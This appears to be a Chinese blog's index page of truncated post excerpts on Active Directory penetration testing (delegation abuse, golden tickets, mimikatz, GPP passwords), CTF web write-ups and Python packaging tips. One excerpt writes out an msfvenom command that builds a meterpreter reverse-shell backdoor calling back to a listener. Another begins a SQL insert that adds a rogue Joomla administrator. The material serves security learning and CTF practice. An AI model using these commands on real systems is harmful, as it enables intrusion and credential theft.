原创 域滲透——基於資源的約束委派利用

環境 域: test.com 域控:Windows server 2012R2, 主機名: AD, IP: 192.168.1.7 委派的域內主機:系統:win2008R2,主機名:win2008,ip:192.168.1.24

原创 非約束委派+Spooler打印機服務 製作黃金票據

環境 域: test.com 域控:Windows server 2012R2, 主機名: AD, IP: 192.168.1.7 域內主機:系統:windows 2008R2,主機名:WIN2008,ip:192.16

原创 發現域中的委派主機或賬戶

PowerView Powerview有兩個版本 一個在dev分支:https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 一個在ma

原创 滲透測試基礎知識

反彈shell MSF windows: 生成後門 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.5 lport=4444 -f exe >

原创 mimikatz的基本使用

常見命令 cls-----------------------------清屏 exit----------------------------退出 version------------查看mimikatz的版本 system:

原创 python中關於pyinstaller的問題一些總結

1、安裝虛擬環境+常用命令 我們都知道,如果直接在複雜的環境使用pyinstaller會使得打包出來的文件十分大 pip install virtualenv pip install virtualenvwrapper-win

原创 2020第五空間 web writeup

hate-php 源碼 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code =

原创 CTF 關於linux 7z解壓的一點trick

示例 假如我們可以任意文件上傳,但是後綴拼接了一個hash256(要求是上傳一個7z壓縮文件,因爲題目對應的功能是解壓後綴爲7z的文件) 1、這個時候我們可以在文件名後面加一個/ 2、此時我們的結構爲filename.zip/ha

原创 PHP 中實體符號 繞過eval Bypass

多的就不介紹了 直接看圖吧

原创 第二屆網鼎杯(第三場:朱雀組)Think Java

首先題目給了一些class文件,這些不需要多說,直接jd-gui反編譯或者使用fernflower反編譯也可以 解題過程 先掃一下目錄 得到swagger-ui.html 發現幾個api接口 sql注入得到密碼 源代碼中明

原创 joomla滲透測試(髒牛提權)

本來是個域滲透,不過環境有問題,就當作web題在做了 解題過程 這是一個joomla cms 我們先掃一下目錄 連接mysql 得到MySQL的賬號和密碼 然後創建新的管理員 INSERT INTO `am2zu_

原创 GPP漏洞利用(轉載)

總結與反思: GPP中管理員給域成員添加的賬號信息存在xml,可以直接破解拿到賬號密碼。 測試環境 windows7 普通域成員 windows2008 域控 首先部署GPP,這裏我部署的策略是給域成員都添加一個test用戶

原创 第二屆網鼎杯web WriteUp

學校戰隊總排名五十幾,web和pwn各拿了一個一血,只能說師傅太強了,不過後來的排名有點起飛,最後半小時,直接從前十名飛出去了~~ filejava 這道題主要考察的是java的xxe漏洞,這個題目總共有兩個功能,上傳和下載功能

原创 域滲透小結

參考連接

原创 python2 中文無法解碼的問題

req = requests.post(url,data=data) req.encoding = 'gbk' print(req.text.encode('gbk').decode(req.apparent_encoding))